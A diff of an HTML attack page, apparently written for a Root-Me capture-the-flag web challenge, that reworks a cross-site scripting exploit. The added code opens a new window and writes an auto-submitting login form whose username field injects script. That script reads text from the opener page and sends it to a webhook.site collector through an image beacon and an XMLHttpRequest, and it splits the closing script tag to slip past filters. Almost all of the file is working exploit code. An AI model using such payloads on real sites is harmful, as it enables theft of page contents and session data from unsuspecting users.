--- a/windowed/second_shared_context.html
+++ b/windowed/second_shared_context.html
@@ -6,29 +6,25 @@
 </head>
 <body>
 <h1>Page 2</h1>
-<form method="POST" action="http://challenge01.root-me.org:58003/login">
-    <input type="text" name="username" value="<script> new Image().src='https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?testencoding=1';
-    var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?g6gResult='+encodeURIComponent(window.opener.document.querySelectorAll('section > p')[2].innerHTML), true);xhr.send();</script>">
-    <input type="text" name="secret" value="FAILED">
-    <input type="submit">
-</form>
 
 <script>
     window.opener.postMessage({redirect: "go"}, "*");
 
-    // function postPayload() {
-    //     fetch("http://challenge01.root-me.org:58003/login", {
-    //         method: "POST",
-    //         body: `username=<script>document.location='https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?g6gResult='+encodeURI(window.opener.document.querySelectorAll('section>p')[2].innerHTML);</sc`+'ript>`
-    //             +`&secret=FAILED `,
-    //         mode: "no-cors"
-    //     })
-    // }
+    const newWin = window.open("about:blank", "_blank");
+    const scriptEnd = '</scri' + 'pt>';
+    // 2. Créer un formulaire et le soumettre dans la nouvelle fenêtre
+    newWin.document.write(`<form method="POST" action="http://challenge01.root-me.org:58003/login">
+    <input type="text" name="username" value="<script> new Image().src='https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?testencoding=1';
+    var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://webhook.site/339f0497-f8d9-43af-9508-3b65ed3f0873?g6gResult='+encodeURIComponent(window.opener.document.querySelectorAll('section > p')[2].innerHTML), true);xhr.send();${scriptEnd}">
+    <input type="text" name="secret" value="FAILED">
+    <input type="submit">
+   </form>
+   <script>document.forms[0].submit()${scriptEnd}`);
 
 
-    setTimeout(() =>{ document.querySelector("form").submit();}, 3000);
-
-
+    setTimeout(() => {
+        document.location = "http://challenge01.root-me.org:58003/profile"
+    }, 3000);
 
 
 </script>
